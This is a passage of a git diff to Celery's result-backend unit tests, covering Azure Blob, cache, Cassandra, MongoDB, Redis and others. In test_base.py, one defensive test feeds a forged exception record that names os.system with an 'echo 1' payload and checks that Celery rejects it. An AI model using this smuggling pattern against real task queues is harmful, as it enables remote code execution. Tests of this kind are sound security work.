+ .assert_called_once_with(blob=base_path + "mykey", container="celery")
+
+ mock_client.get_blob_client.return_value \
+ .download_blob.return_value \
+ .readall.return_value \
+ .decode.assert_called_once()
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
def test_get_missing(self, mock_client):
- mock_client.get_blob_to_text.side_effect = \
- azureblockblob.AzureMissingResourceHttpError("Missing", 404)
+ mock_client.get_blob_client.return_value \
+ .download_blob.return_value \
+ .readall.side_effect = azureblockblob.ResourceNotFoundError
assert self.backend.get(b"mykey") is None
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_set(self, mock_client):
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_set(self, mock_client, base_path):
+ self.backend.base_path = base_path
self.backend._set_with_state(b"mykey", "myvalue", states.SUCCESS)
- mock_client.create_blob_from_text.assert_called_once_with(
- "celery", "mykey", "myvalue")
+ mock_client.get_blob_client.assert_called_once_with(
+ container="celery", blob=base_path + "mykey")
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_mget(self, mock_client):
+ mock_client.get_blob_client.return_value \
+ .upload_blob.assert_called_once_with("myvalue", overwrite=True)
+
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_mget(self, mock_client, base_path):
keys = [b"mykey1", b"mykey2"]
+ self.backend.base_path = base_path
self.backend.mget(keys)
- mock_client.get_blob_to_text.assert_has_calls(
- [call("celery", "mykey1"),
- call("celery", "mykey2")])
+ mock_client.get_blob_client.assert_has_calls(
+ [call(blob=base_path + key.decode(), container='celery') for key in keys],
+ any_order=True,)
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_delete(self, mock_client):
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_delete(self, mock_client, base_path):
+ self.backend.base_path = base_path
self.backend.delete(b"mykey")
- mock_client.delete_blob.assert_called_once_with(
- "celery", "mykey")
+ mock_client.get_blob_client.assert_called_once_with(
+ container="celery", blob=base_path + "mykey")
+
+ mock_client.get_blob_client.return_value \
+ .delete_blob.assert_called_once()
+
+ def test_base_path_conf(self, base_path):
+ self.app.conf.azureblockblob_base_path = base_path
+ backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+ assert backend.base_path == base_path
+
+ def test_base_path_conf_default(self):
+ backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+ assert backend.base_path == ''
+
+
+class test_as_uri:
+ def setup(self):
+ self.url = (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=account_key;"
+ "EndpointSuffix=suffix"
+ )
+ self.backend = AzureBlockBlobBackend(
+ app=self.app,
+ url=self.url
+ )
+
+ def test_as_uri_include_password(self):
+ assert self.backend.as_uri(include_password=True) == self.url
+
+ def test_as_uri_exclude_password(self):
+ assert self.backend.as_uri(include_password=False) == (
+ "azureblockblob://"
+ "DefaultEndpointsProtocol=protocol;"
+ "AccountName=name;"
+ "AccountKey=**;"
+ "EndpointSuffix=suffix"
+ )
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index fbcda1ceb3e..203cbfdd534 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -1,6 +1,6 @@
-import sys
+import re
from contextlib import contextmanager
-from unittest.mock import ANY, Mock, call, patch, sentinel
+from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel
import pytest
from kombu.serialization import prepare_accept_content
@@ -12,7 +12,7 @@
from celery.backends.base import (BaseBackend, DisabledBackend,
KeyValueStoreBackend, _nulldict)
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
- ChordError, TimeoutError)
+ ChordError, SecurityError, TimeoutError)
from celery.result import result_from_tuple
from celery.utils import serialization
from celery.utils.functional import pass1
@@ -190,26 +190,36 @@ def test_on_chord_part_return(self):
def test_apply_chord(self, unlock='celery.chord_unlock'):
self.app.tasks[unlock] = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
uuid(),
[self.app.AsyncResult(x) for x in range(3)],
)
- self.b.apply_chord(header_result, self.callback.s())
+ self.b.apply_chord(header_result_args, self.callback.s())
assert self.app.tasks[unlock].apply_async.call_count
def test_chord_unlock_queue(self, unlock='celery.chord_unlock'):
self.app.tasks[unlock] = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
uuid(),
[self.app.AsyncResult(x) for x in range(3)],
)
body = self.callback.s()
- self.b.apply_chord(header_result, body)
+ self.b.apply_chord(header_result_args, body)
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
- assert called_kwargs['queue'] is None
+ assert called_kwargs['queue'] == 'testcelery'
+
+ routing_queue = Mock()
+ routing_queue.name = "routing_queue"
+ self.app.amqp.router.route = Mock(return_value={
+ "queue": routing_queue
+ })
+ self.b.apply_chord(header_result_args, body)
+ assert self.app.amqp.router.route.call_args[0][1] == body.name
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs["queue"] == "routing_queue"
- self.b.apply_chord(header_result, body.set(queue='test_queue'))
+ self.b.apply_chord(header_result_args, body.set(queue='test_queue'))
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
assert called_kwargs['queue'] == 'test_queue'
@@ -217,10 +227,25 @@ def test_chord_unlock_queue(self, unlock='celery.chord_unlock'):
def callback_queue(result):
pass
- self.b.apply_chord(header_result, callback_queue.s())
+ self.b.apply_chord(header_result_args, callback_queue.s())
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
assert called_kwargs['queue'] == 'test_queue_two'
+ with self.Celery() as app2:
+ @app2.task(name='callback_different_app', shared=False)
+ def callback_different_app(result):
+ pass
+
+ callback_different_app_signature = self.app.signature('callback_different_app')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] == 'routing_queue'
+
+ callback_different_app_signature.set(queue='test_queue_three')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] == 'test_queue_three'
+
class test_exception_pickle:
def test_BaseException(self):
@@ -258,7 +283,6 @@ def test_json_exception_arguments(self):
y = self.b.exception_to_python(x)
assert isinstance(y, Exception)
- @pytest.mark.skipif(sys.version_info < (3, 3), reason='no qualname support')
def test_json_exception_nested(self):
self.b.serializer = 'json'
x = self.b.prepare_exception(objectexception.Nested('msg'))
@@ -276,10 +300,7 @@ def test_impossible(self):
assert str(x)
y = self.b.exception_to_python(x)
assert y.__class__.__name__ == 'Impossible'
- if sys.version_info < (2, 5):
- assert y.__class__.__module__
- else:
- assert y.__class__.__module__ == 'foo.module'
+ assert y.__class__.__module__ == 'foo.module'
def test_regular(self):
self.b.serializer = 'pickle'
@@ -322,7 +343,7 @@ def delete(self, key):
class DictBackend(BaseBackend):
def __init__(self, *args, **kwargs):
- BaseBackend.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
self._data = {'can-delete': {'result': 'foo'}}
def _restore_group(self, group_id):
@@ -403,9 +424,6 @@ def test_fail_from_current_stack(self):
self.b.mark_as_failure = Mock()
frame_list = []
- if (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear = Mock()
-
def raise_dummy():
frame_str_temp = str(inspect.currentframe().__repr__)
frame_list.append(frame_str_temp)
@@ -420,14 +438,11 @@ def raise_dummy():
assert args[1] is exc
assert args[2]
- if sys.version_info >= (3, 5, 0):
- tb_ = exc.__traceback__
- while tb_ is not None:
- if str(tb_.tb_frame.__repr__) == frame_list[0]:
- assert len(tb_.tb_frame.f_locals) == 0
- tb_ = tb_.tb_next
- elif (2, 7, 0) <= sys.version_info < (3, 0, 0):
- sys.exc_clear.assert_called()
+ tb_ = exc.__traceback__
+ while tb_ is not None:
+ if str(tb_.tb_frame.__repr__) == frame_list[0]:
+ assert len(tb_.tb_frame.f_locals) == 0
+ tb_ = tb_.tb_next
def test_prepare_value_serializes_group_result(self):
self.b.serializer = 'json'
@@ -545,22 +560,53 @@ def test_mark_as_revoked__chord(self):
b.on_chord_part_return.assert_called_with(request, states.REVOKED, ANY)
def test_chord_error_from_stack_raises(self):
+ class ExpectedException(Exception):
+ pass
+
b = BaseBackend(app=self.app)
- exc = KeyError()
- callback = Mock(name='callback')
+ callback = MagicMock(name='callback')
callback.options = {'link_error': []}
+ callback.keys.return_value = []
task = self.app.tasks[callback.task] = Mock()
b.fail_from_current_stack = Mock()
- group = self.patching('celery.group')
- group.side_effect = exc
- b.chord_error_from_stack(callback, exc=ValueError())
+ self.patching('celery.group')
+ with patch.object(
+ b, "_call_task_errbacks", side_effect=ExpectedException()
+ ) as mock_call_errbacks:
+ b.chord_error_from_stack(callback, exc=ValueError())
task.backend.fail_from_current_stack.assert_called_with(
- callback.id, exc=exc)
+ callback.id, exc=mock_call_errbacks.side_effect,
+ )
def test_exception_to_python_when_None(self):
b = BaseBackend(app=self.app)
assert b.exception_to_python(None) is None
+ def test_not_an_actual_exc_info(self):
+ pass
+
+ def test_not_an_exception_but_a_callable(self):
+ x = {
+ 'exc_message': ('echo 1',),
+ 'exc_type': 'system',
+ 'exc_module': 'os'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")):
+ self.b.exception_to_python(x)
+
+ def test_not_an_exception_but_another_object(self):
+ x = {
+ 'exc_message': (),
+ 'exc_type': 'object',
+ 'exc_module': 'builtins'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got builtins.object with payload ()")):
+ self.b.exception_to_python(x)
+
def test_exception_to_python_when_attribute_exception(self):
b = BaseBackend(app=self.app)
test_exception = {'exc_type': 'AttributeDoesNotExist',
@@ -797,6 +843,18 @@ def callback(result):
callback.backend.fail_from_current_stack = Mock()
yield task, deps, cb
+ def test_chord_part_return_timeout(self):
+ with self._chord_part_context(self.b) as (task, deps, _):
+ try:
+ self.app.conf.result_chord_join_timeout += 1.0
+ self.b.on_chord_part_return(task.request, 'SUCCESS', 10)
+ finally:
+ self.app.conf.result_chord_join_timeout -= 1.0
+
+ self.b.expire.assert_not_called()
+ deps.delete.assert_called_with()
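+        # the join timeout reflects result_chord_join_timeout after the temporary 1.0 bump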
+ deps.join_native.assert_called_with(propagate=True, timeout=4.0)
+
def test_chord_part_return_propagate_set(self):
with self._chord_part_context(self.b) as (task, deps, _):
self.b.on_chord_part_return(task.request, 'SUCCESS', 10)
@@ -859,15 +917,15 @@ def test_restore_group_from_pickle(self):
def test_chord_apply_fallback(self):
self.b.implements_incr = False
self.b.fallback_chord_unlock = Mock()
- header_result = self.app.GroupResult(
+ header_result_args = (
'group_id',
[self.app.AsyncResult(x) for x in range(3)],
)
self.b.apply_chord(
- header_result, 'body', foo=1,
+ header_result_args, 'body', foo=1,
)
self.b.fallback_chord_unlock.assert_called_with(
- header_result, 'body', foo=1,
+ self.app.GroupResult(*header_result_args), 'body', foo=1,
)
def test_get_missing_meta(self):
diff --git a/t/unit/backends/test_cache.py b/t/unit/backends/test_cache.py
index 6bd23d9d3d2..40ae4277331 100644
--- a/t/unit/backends/test_cache.py
+++ b/t/unit/backends/test_cache.py
@@ -4,12 +4,12 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.utils.encoding import ensure_bytes, str_to_bytes
from celery import signature, states, uuid
from celery.backends.cache import CacheBackend, DummyClient, backends
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
class SomeClass:
@@ -35,6 +35,16 @@ def test_no_backend(self):
with pytest.raises(ImproperlyConfigured):
CacheBackend(backend=None, app=self.app)
+ def test_memory_client_is_shared(self):
+ """This test verifies that memory:// backend state is shared over multiple threads"""
+ from threading import Thread
+ t = Thread(
+ target=lambda: CacheBackend(backend='memory://', app=self.app).set('test', 12345)
+ )
+ t.start()
+ t.join()
+ assert self.tb.client.get('test') == 12345
+
def test_mark_as_done(self):
assert self.tb.get_state(self.tid) == states.PENDING
assert self.tb.get_result(self.tid) is None
@@ -61,12 +71,12 @@ def test_mark_as_failure(self):
def test_apply_chord(self):
tb = CacheBackend(backend='memory://', app=self.app)
- result = self.app.GroupResult(
+ result_args = (
uuid(),
[self.app.AsyncResult(uuid()) for _ in range(3)],
)
- tb.apply_chord(result, None)
- assert self.app.GroupResult.restore(result.id, backend=tb) == result
+ tb.apply_chord(result_args, None)
+ assert self.app.GroupResult.restore(result_args[0], backend=tb) == self.app.GroupResult(*result_args)
@patch('celery.result.GroupResult.restore')
def test_on_chord_part_return(self, restore):
@@ -81,12 +91,12 @@ def test_on_chord_part_return(self, restore):
self.app.tasks['foobarbaz'] = task
task.request.chord = signature(task)
- result = self.app.GroupResult(
+ result_args = (
uuid(),
[self.app.AsyncResult(uuid()) for _ in range(3)],
)
- task.request.group = result.id
- tb.apply_chord(result, None)
+ task.request.group = result_args[0]
+ tb.apply_chord(result_args, None)
deps.join_native.assert_not_called()
tb.on_chord_part_return(task.request, 'SUCCESS', 10)
@@ -138,7 +148,7 @@ def test_regression_worker_startup_info(self):
'cache+memcached://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
@@ -191,31 +201,31 @@ class test_get_best_memcache(MockCacheMixin):
def test_pylibmc(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
assert cache.get_best_memcache()[0].__module__ == 'pylibmc'
- def test_memcache(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- assert (cache.get_best_memcache()[0]().__module__ ==
- 'memcache')
-
- def test_no_implementations(self):
- with mock.mask_modules('pylibmc', 'memcache'):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
- with pytest.raises(ImproperlyConfigured):
- cache.get_best_memcache()
+ assert (cache.get_best_memcache()[0]().__module__ ==
+ 'memcache')
+
+ @pytest.mark.masked_modules('pylibmc', 'memcache')
+ def test_no_implementations(self, mask_modules):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ with pytest.raises(ImproperlyConfigured):
+ cache.get_best_memcache()
def test_cached(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
cache.get_best_memcache()[0](behaviors={'foo': 'bar'})
@@ -231,30 +241,30 @@ def test_backends(self):
class test_memcache_key(MockCacheMixin):
- def test_memcache_unicode_key(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_unicode_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
-
- def test_memcache_bytes_key(self):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
+
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_bytes_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str_to_bytes(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str_to_bytes(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
def test_pylibmc_unicode_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
@@ -264,7 +274,7 @@ def test_pylibmc_unicode_key(self):
assert b.get_result(task_id) == result
def test_pylibmc_bytes_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
diff --git a/t/unit/backends/test_cassandra.py b/t/unit/backends/test_cassandra.py
index 3e648bff0ed..5df53a1e576 100644
--- a/t/unit/backends/test_cassandra.py
+++ b/t/unit/backends/test_cassandra.py
@@ -3,7 +3,6 @@
from unittest.mock import Mock
import pytest
-from case import mock
from celery import states
from celery.exceptions import ImproperlyConfigured
@@ -17,7 +16,6 @@
]
-@mock.module(*CASSANDRA_MODULES)
class test_CassandraBackend:
def setup(self):
@@ -27,7 +25,8 @@ def setup(self):
cassandra_table='task_results',
)
- def test_init_no_cassandra(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_no_cassandra(self, module):
# should raise ImproperlyConfigured when no python-driver
# installed.
from celery.backends import cassandra as mod
@@ -38,7 +37,8 @@ def test_init_no_cassandra(self, *modules):
finally:
mod.cassandra = prev
- def test_init_with_and_without_LOCAL_QUROM(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_with_and_without_LOCAL_QUROM(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -60,12 +60,14 @@ def test_init_with_and_without_LOCAL_QUROM(self, *modules):
app=self.app, keyspace='b', column_family='c',
)
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
@pytest.mark.usefixtures('depends_on_current_app')
- def test_reduce(self, *modules):
+ def test_reduce(self, module):
from celery.backends.cassandra import CassandraBackend
assert loads(dumps(CassandraBackend(app=self.app)))
- def test_get_task_meta_for(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_get_task_meta_for(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -95,7 +97,8 @@ def test_as_uri(self):
x.as_uri()
x.as_uri(include_password=False)
- def test_store_result(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_store_result(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
diff --git a/t/unit/backends/test_consul.py b/t/unit/backends/test_consul.py
index 4e13ab9d8a5..61fb5d41afd 100644
--- a/t/unit/backends/test_consul.py
+++ b/t/unit/backends/test_consul.py
@@ -22,10 +22,21 @@ def test_consul_consistency(self):
def test_get(self):
index = 100
data = {'Key': 'test-consul-1', 'Value': 'mypayload'}
- self.backend.client = Mock(name='c.client')
- self.backend.client.kv.get.return_value = (index, data)
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.get.return_value = (index, data)
assert self.backend.get(data['Key']) == 'mypayload'
+ def test_set(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.session.create.return_value = 'c8dfa770-4ea3-2ee9-d141-98cf0bfe9c59'
+ self.backend.one_client.kv.put.return_value = True
+ assert self.backend.set('Key', 'Value') is True
+
+ def test_delete(self):
+ self.backend.one_client = Mock(name='c.client')
+ self.backend.one_client.kv.delete.return_value = True
+ assert self.backend.delete('Key') is True
+
def test_index_bytes_key(self):
key = 'test-consul-2'
assert self.backend._key_to_consul_key(key) == key
diff --git a/t/unit/backends/test_couchbase.py b/t/unit/backends/test_couchbase.py
index a29110c9439..297735a38ba 100644
--- a/t/unit/backends/test_couchbase.py
+++ b/t/unit/backends/test_couchbase.py
@@ -13,7 +13,7 @@
try:
import couchbase
except ImportError:
- couchbase = None # noqa
+ couchbase = None
COUCHBASE_BUCKET = 'celery_bucket'
diff --git a/t/unit/backends/test_couchdb.py b/t/unit/backends/test_couchdb.py
index c8b4a43ec2c..41505594f72 100644
--- a/t/unit/backends/test_couchdb.py
+++ b/t/unit/backends/test_couchdb.py
@@ -11,7 +11,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
COUCHDB_CONTAINER = 'celery_container'
diff --git a/t/unit/backends/test_database.py b/t/unit/backends/test_database.py
index bff42361841..28e2fedbbbb 100644
--- a/t/unit/backends/test_database.py
+++ b/t/unit/backends/test_database.py
@@ -13,7 +13,8 @@
from celery.backends.database import (DatabaseBackend, retry, session, # noqa
session_cleanup)
from celery.backends.database.models import Task, TaskSet # noqa
-from celery.backends.database.session import SessionManager # noqa
+from celery.backends.database.session import ( # noqa
+ PREPARE_MODELS_MAX_RETRIES, ResultModelBase, SessionManager)
from t import skip # noqa
@@ -398,3 +399,28 @@ def test_coverage_madness(self):
SessionManager()
finally:
session.register_after_fork = prev
+
+ @patch('celery.backends.database.session.create_engine')
+ def test_prepare_models_terminates(self, create_engine):
+ """SessionManager.prepare_models has retry logic because the creation
+ of database tables by multiple workers is racy. This test patches
+        the underlying method so it always raises, letting us verify that
+        the retry loop eventually terminates.
+ """
+ from sqlalchemy.dialects.sqlite import dialect
+ from sqlalchemy.exc import DatabaseError
+
+ sqlite = dialect.dbapi()
+ manager = SessionManager()
+ engine = manager.get_engine('dburi')
+
+ def raise_err(bind):
+ raise DatabaseError("", "", [], sqlite.DatabaseError)
+
+ patch_create_all = patch.object(
+ ResultModelBase.metadata, 'create_all', side_effect=raise_err)
+
+ with pytest.raises(DatabaseError), patch_create_all as mock_create_all:
+ manager.prepare_models(engine)
+
+ assert mock_create_all.call_count == PREPARE_MODELS_MAX_RETRIES + 1
diff --git a/t/unit/backends/test_dynamodb.py b/t/unit/backends/test_dynamodb.py
index 62f50b6625b..6fd2625c0cb 100644
--- a/t/unit/backends/test_dynamodb.py
+++ b/t/unit/backends/test_dynamodb.py
@@ -13,7 +13,7 @@
class test_DynamoDBBackend:
def setup(self):
- self._static_timestamp = Decimal(1483425566.52) # noqa
+ self._static_timestamp = Decimal(1483425566.52)
self.app.conf.result_backend = 'dynamodb://'
@property
diff --git a/t/unit/backends/test_filesystem.py b/t/unit/backends/test_filesystem.py
index 98a37b2e070..4fb46683f4f 100644
--- a/t/unit/backends/test_filesystem.py
+++ b/t/unit/backends/test_filesystem.py
@@ -1,6 +1,9 @@
import os
import pickle
+import sys
import tempfile
+import time
+from unittest.mock import patch
import pytest
@@ -92,3 +95,36 @@ def test_forget_deletes_file(self):
def test_pickleable(self):
tb = FilesystemBackend(app=self.app, url=self.url, serializer='pickle')
assert pickle.loads(pickle.dumps(tb))
+
+ @pytest.mark.skipif(sys.platform == 'win32', reason='Test can fail on '
+ 'Windows/FAT due to low granularity of st_mtime')
+ def test_cleanup(self):
+ tb = FilesystemBackend(app=self.app, url=self.url)
+ yesterday_task_ids = [uuid() for i in range(10)]
+ today_task_ids = [uuid() for i in range(10)]
+ for tid in yesterday_task_ids:
+ tb.mark_as_done(tid, 42)
+ day_length = 0.2
+ time.sleep(day_length) # let FS mark some difference in mtimes
+ for tid in today_task_ids:
+ tb.mark_as_done(tid, 42)
+ with patch.object(tb, 'expires', 0):
+ tb.cleanup()
+ # test that zero expiration time prevents any cleanup
+ filenames = set(os.listdir(tb.path))
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids + today_task_ids
+ )
+ # test that non-zero expiration time enables cleanup by file mtime
+ with patch.object(tb, 'expires', day_length):
+ tb.cleanup()
+ filenames = set(os.listdir(tb.path))
+ assert not any(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids
+ )
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in today_task_ids
+ )
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index fb304b7e369..b56e928b026 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -1,11 +1,9 @@
import datetime
-import sys
from pickle import dumps, loads
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import pytest
import pytz
-from case import mock
from kombu.exceptions import EncodeError
try:
@@ -16,6 +14,7 @@
from celery import states, uuid
from celery.backends.mongodb import Binary, InvalidDocument, MongoBackend
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
COLLECTION = 'taskmeta_celery'
TASK_ID = uuid()
@@ -46,7 +45,6 @@ def setup(self):
self.patching('celery.backends.mongodb.MongoBackend.encode')
self.patching('celery.backends.mongodb.MongoBackend.decode')
self.patching('celery.backends.mongodb.Binary')
- self.patching('datetime.datetime')
self.backend = MongoBackend(app=self.app, url=self.default_url)
def test_init_no_mongodb(self, patching):
@@ -485,6 +483,12 @@ def test_cleanup(self, mock_get_database):
mock_get_database.assert_called_once_with()
mock_collection.delete_many.assert_called()
+ self.backend.collections = mock_collection = Mock()
+ self.backend.expires = None
+
+ self.backend.cleanup()
+ mock_collection.delete_many.assert_not_called()
+
def test_get_database_authfailure(self):
x = MongoBackend(app=self.app)
x._get_connection = Mock()
@@ -525,7 +529,7 @@ def test_regression_worker_startup_info(self):
'/work4us?replicaSet=rs&ssl=true'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
@@ -653,18 +657,29 @@ def test_encode_success_results(self, mongo_backend_factory, serializer,
backend = mongo_backend_factory(serializer=serializer)
backend.store_result(TASK_ID, result, 'SUCCESS')
recovered = backend.get_result(TASK_ID)
- if sys.version_info.major == 2 and isinstance(recovered, str):
- result_type = str # workaround for python 2 compatibility and `unicode_literals`
assert type(recovered) == result_type
assert recovered == result
+ @pytest.mark.parametrize("serializer",
+ ["bson", "pickle", "yaml", "json", "msgpack"])
+ def test_encode_chain_results(self, mongo_backend_factory, serializer):
+ backend = mongo_backend_factory(serializer=serializer)
+ mock_request = MagicMock(spec=['children'])
+ children = [self.app.AsyncResult(uuid()) for i in range(10)]
+ mock_request.children = children
+ backend.store_result(TASK_ID, 0, 'SUCCESS', request=mock_request)
+ recovered = backend.get_children(TASK_ID)
+        def tuple_to_list(t):
+            return [list(t[0]), t[1]]
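+        # the recovered children carry their tuples as lists, hence the conversion helper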
+ assert recovered == [tuple_to_list(c.as_tuple()) for c in children]
+
@pytest.mark.parametrize("serializer",
["bson", "pickle", "yaml", "json", "msgpack"])
def test_encode_exception_error_results(self, mongo_backend_factory,
serializer):
backend = mongo_backend_factory(serializer=serializer)
exception = Exception("Basic Exception")
- backend.store_result(TASK_ID, exception, 'FAILURE')
+ traceback = 'Traceback:\n Exception: Basic Exception\n'
+ backend.store_result(TASK_ID, exception, 'FAILURE', traceback)
recovered = backend.get_result(TASK_ID)
assert type(recovered) == type(exception)
assert recovered.args == exception.args
diff --git a/t/unit/backends/test_redis.py b/t/unit/backends/test_redis.py
index 3f6257c8ae7..f99fbc37a55 100644
--- a/t/unit/backends/test_redis.py
+++ b/t/unit/backends/test_redis.py
@@ -1,3 +1,4 @@
+import itertools
import json
import random
import ssl
@@ -7,12 +8,15 @@
from unittest.mock import ANY, Mock, call, patch
import pytest
-from case import ContextMock, mock
from celery import signature, states, uuid
from celery.canvas import Signature
-from celery.exceptions import ChordError, ImproperlyConfigured
+from celery.contrib.testing.mocks import ContextMock
+from celery.exceptions import (BackendStoreError, ChordError,
+ ImproperlyConfigured)
+from celery.result import AsyncResult, GroupResult
from celery.utils.collections import AttributeDict
+from t.unit import conftest
def raise_on_second_call(mock, exc, *retval):
@@ -58,7 +62,7 @@ def execute(self):
return [step(*a, **kw) for step, a, kw in self.steps]
-class PubSub(mock.MockCallbacks):
+class PubSub(conftest.MockCallbacks):
def __init__(self, ignore_subscribe_messages=False):
self._subscribed_to = set()
@@ -75,7 +79,7 @@ def get_message(self, timeout=None):
pass
-class Redis(mock.MockCallbacks):
+class Redis(conftest.MockCallbacks):
Connection = Connection
Pipeline = Pipeline
pubsub = PubSub
@@ -140,7 +144,7 @@ def zadd(self, key, mapping):
def zrange(self, key, start, stop):
# `stop` is inclusive in Redis so we use `stop + 1` unless that would
- # cause us to move from negative (right-most) indicies to positive
+ # cause us to move from negative (right-most) indices to positive
stop = stop + 1 if stop != -1 else None
return [e[1] for e in self._get_sorted_set(key)[start:stop]]
@@ -155,7 +159,7 @@ def zcount(self, key, min_, max_):
return len(self.zrangebyscore(key, min_, max_))
-class Sentinel(mock.MockCallbacks):
+class Sentinel(conftest.MockCallbacks):
def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None,
**connection_kwargs):
self.sentinel_kwargs = sentinel_kwargs
@@ -273,8 +277,17 @@ def test_drain_events_connection_error(self, parent_on_state_change, cancel_for)
parent_on_state_change.assert_called_with(meta, None)
assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'}
+ def test_drain_events_connection_error_no_patch(self):
+ meta = {'task_id': 'initial', 'status': states.SUCCESS}
+ consumer = self.get_consumer()
+ consumer.start('initial')
+ consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS)
+ consumer._pubsub.get_message.side_effect = ConnectionError()
+ consumer.drain_events()
+ consumer._pubsub.subscribe.assert_not_called()
-class test_RedisBackend:
+
+class basetest_RedisBackend:
def get_backend(self):
